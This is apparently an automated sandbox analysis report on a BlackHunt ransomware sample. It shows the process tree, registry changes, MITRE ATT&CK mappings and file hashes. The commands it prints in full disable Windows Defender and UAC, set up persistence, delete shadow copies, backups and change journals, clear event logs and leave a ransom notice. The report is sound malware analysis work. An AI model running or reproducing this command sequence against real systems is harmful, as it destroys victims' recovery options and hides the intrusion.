wrote to memory of 2628 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 52 PID 3000 wrote to memory of 2628 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 52 PID 3000 wrote to memory of 2628 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 52 PID 3000 wrote to memory of 2628 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 52 PID 3000 wrote to memory of 2568 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 55 PID 3000 wrote to memory of 2568 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 55 PID 3000 wrote to memory of 2568 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 55 PID 3000 wrote to memory of 2568 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 55 PID 2732 wrote to memory of 2064 2732 cmd.exe 57 PID 2732 wrote to memory of 2064 2732 cmd.exe 57 PID 2732 wrote to memory of 2064 2732 cmd.exe 57 PID 3000 wrote to memory of 2648 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 59 PID 3000 wrote to memory of 2648 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 59 PID 3000 wrote to memory of 2648 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 59 PID 3000 wrote to memory of 2648 3000 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe 59 PID 2788 wrote to memory of 2592 2788 cmd.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe"C:\Users\Admin\AppData\Local\Temp\22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:3052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2072
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe" /F2⤵PID:1700
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe" /F3⤵
- Creates scheduled task(s)
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1920
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1772
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1900
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1676
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1512
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1324
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2440
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2448
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:772
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3888
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3824
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3392
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4012
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1192
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1284
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3932
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1064
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4056
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3128
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2736
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3144
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2680
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1716
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3900
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2600
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\22dc8ba5c67f6ea21f5178806c64b8d88771eda260c01b06b02b47e4c6844d52.exe"2⤵
- Deletes itself
PID:3036 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3196
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3044
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4048
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59232d615176f3ada31cc6f0bb6027066
SHA1f7b86296995168f9f270cfbcc75dd687934028ec
SHA256e93352463fbcf291533c6f10e08c3d06a3548d9ddc5c427402b190a2fe0644a2
SHA512c4674a2b4b11e8cf65bca9602190256af55eec21f5f128eab5f54ad696327a94651acc2af1347d2e450f98daa90ad0a3706901e7572c7e98d6c426ea351a963a
-
Filesize
12KB
MD511d732787c0d83b21101c9a649ae4ca7
SHA1bae711f6ef30431df538b60c273a1fda80a1628a
